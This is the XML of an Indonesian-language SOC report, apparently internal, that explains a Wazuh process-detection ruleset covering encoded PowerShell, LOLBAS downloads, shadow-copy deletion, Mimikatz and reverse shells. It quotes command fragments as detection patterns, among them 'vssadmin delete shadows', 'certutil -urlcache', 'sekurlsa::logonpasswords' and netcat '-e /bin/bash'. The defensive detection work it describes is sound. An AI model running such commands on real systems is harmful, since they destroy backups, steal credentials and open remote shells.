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DETEKSI ANOMALI EKSEKUSI PROSES, LOLBAS &amp; REVERSE SHELL WAZUH SIEM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>*Bedah Analisis, Rasionalisasi Bisnis &amp; Pembuktian Empiris File `020-process.xml` (Rule ID 100100 – 100199)*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SEC-DOC-WZH-020-PROC-2026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Head of Security Operations Center (SOC), Lead Security Engineer, CISO, dan IT Management</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dan Dokumen Investigasi Forensik FP/TP (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docs/laporan FP_TP/52002.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>52004.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>31110.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>11.docx</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 xml:space="preserve">Ketika peretas berhasil menembus pertahanan perimeter (misalnya melalui eksploitasi web atau pencurian kredensial), mereka </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>wajib mengeksekusi proses biner (*Process Execution*)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> untuk mewujudkan tujuannya—mulai dari menyembunyikan jejak (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Defense Evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), mengunduh malware (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Ingress Tool Transfer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), mencuri password di memori (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Credential Dumping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>), hingga melumpuhkan backup untuk pemerasan ransomware (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Inhibit System Recovery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">File ruleset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>020-process.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> adalah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>garda pertahanan tingkat lanjut (*Endpoint Detection and Response - EDR Layer*)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada SIEM Wazuh. Modul ini bertugas mendeteksi aktivitas eksekusi proses paling berbahaya di sistem operasi Windows dan Linux.</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 xml:space="preserve">File ini merupakan modul deteksi anomali proses (Tier-1 Detection) yang mengevaluasi seluruh command-line dan syscall yang telah dinormalisasi oleh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>001-base-normalization.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Modul ini mengidentifikasi eksekusi skrip PowerShell terenkripsi Base64 (T1059.001/T1027), penyalahgunaan utilitas bawaan Windows/Linux yang sah untuk tujuan jahat atau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>LOLBAS / Living Off The Land Binaries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (T1105), persiapan ransomware via penghapusan bayangan backup Shadow Copy (T1490), pencurian password memori LSASS via Mimikatz (T1003.001), dan pembukaan akses kendali jarak jauh interaktif </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Reverse Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (T1059.004).</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Penyerang modern saat ini jarang menggunakan malware biner mentah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> yang mudah diendus antivirus biasa. Mereka menggunakan taktik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>"Living Off The Land"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">—yaitu memanfaatkan biner resmi milik Windows seperti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>certutil.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bitsadmin.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, dan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vssadmin.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Tanpa file ini:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. Perintah berbahaya yang disamarkan menggunakan encoding Base64 akan lolos tanpa terdeteksi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Utilitas </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (yang aslinya untuk sertifikat digital) dapat bebas digunakan penyerang untuk mengunduh Trojan perusak dari internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Ransomware dapat menghapus seluruh salinan cadangan (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Volume Shadow Copies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) dalam hitungan detik sebelum mengenkripsi server, menyebabkan kerugian operasional permanen tanpa ada jalan pemulihan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Analis SOC terlambat mengetahui bahwa penyerang telah membuka terminal kendali jarak jauh (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Interactive Reverse Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) di server Linux produksi.</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1. Memberikan deteksi berbasis tanda tangan perilaku (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Behavioral Command-Line Signatures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) berakurasi tinggi dengan tingkat keparahan tinggi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Level 7 hingga Level 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Menghentikan penyerang pada fase eksekusi awal (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Early Kill Chain Containment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) sebelum mereka berhasil menyebarkan ransomware atau melakukan pencurian data massal (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Data Exfiltration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Memasok data pemicu kritis bagi engine korelasi rantai serangan tingkat lanjut pada file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>070-correlation.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (khususnya CORR-003 dan CORR-005).</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("Linggis Standar Teknisi di Tangan Penyusup")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Untuk menjelaskan konsep LOLBAS dan Process Anomaly secara non-teknis kepada jajaran pimpinan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*"Bayangkan gedung kantor kita memiliki gudang perkakas resmi yang berisi palu, linggis, dan tangga milik tim teknisi internal gedung (ini analogi dari utilitas resmi Windows/Linux seperti PowerShell, Certutil, dan VSSAdmin).*</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*Jika teknisi resmi menggunakan tangga di siang hari untuk mengganti lampu, itu wajar.*</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*Namun, file `020-process.xml` memantau siapa yang memegang perkakas tersebut dan untuk apa tujuannya:*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. *Jika ada orang yang memakai topeng dan jas hitam (Encoded PowerShell / Rule 100100), sistem langsung waspada.*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>2. *Jika ada orang menggunakan tali pemadam kebakaran untuk mengerek bungkusan misterius dari luar jendela gedung (LOLBAS Certutil Download / Rule 100101), ini adalah indikasi penyelundupan senjata.*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>3. *Jika ada orang mengambil palu godam lalu secara sengaja menghancurkan seluruh tabung pemadam api dan pintu darurat (VSSAdmin Delete Shadows / Rule 100102), tujuannya jelas: mereka sedang bersiap membakar gedung agar tidak ada yang bisa memadamkannya (Ransomware Preparation).*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto" w:before="80"/>
        <w:ind w:left="576" w:right="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2C5282"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>4. *Jika ada lubang tikus rahasia yang terhubung langsung ke markas komplotan penjahat di seberang jalan (Reverse Shell / Rule 100104), alarm merah darurat langsung berbunyi.*</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`020-process.xml` tidak menunggu virus terdeteksi, melainkan mendeteksi **niat jahat dari tindakan penggunaan alat-alat tersebut**."*</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Pencegahan Ransomware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Serangan Proses</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Finansial &amp; Operasional Tanpa Modul Ini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Nyata Modul `020-process.xml`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Serangan Ransomware (Penghapusan Backup)</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Penyerang menghapus shadow copy via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>vssadmin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> sebelum enkripsi. Perusahaan kehilangan data permanen atau dipaksa membayar tebusan miliaran rupiah.</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100102 (Level 9).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Mendeteksi perintah </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>vssadmin delete shadows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> dan </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>wbadmin delete catalog</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> sebelum proses enkripsi massal dimulai.</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Infiltrasi Senjata Siber (Ingress Tool Transfer)</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mengunduh backdoor/rootkit menggunakan biner sah sistem (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>certutil</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>bitsadmin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>curl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>) tanpa terblokir antivirus tradisional.</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100101 (Level 8).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Langsung menandai penggunaan parameter berbahaya seperti </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>certutil -urlcache</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> dan </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>bitsadmin /transfer</w:t>
            </w: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Pembobolan Master Kredensial (LSASS Dump)</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Penyerang mendump memori proses LSASS menggunakan Mimikatz, mendapatkan seluruh password plaintext domain admin.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100103 (Level 8).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Mendeteksi panggilan </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mimikatz</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sekurlsa::logonpasswords</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, dan dumping LSASS secara instan.</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Remote Command Execution (Reverse Shell)</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menguasai terminal command-line server web secara penuh dan tidak terlihat oleh monitoring biasa.</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100104 (Level 10).</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Mendeteksi soket TCP interaktif </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/dev/tcp/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> dan netcat shell </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C53030"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-e /bin/bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>, memicu respon darurat SOC.</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(`020-process.xml`)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(`020-process.xml`)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Visibilitas Perintah CLI</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Hanya mencatat event eksekusi mentah tanpa pemahaman semantik dari argumen perintah (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
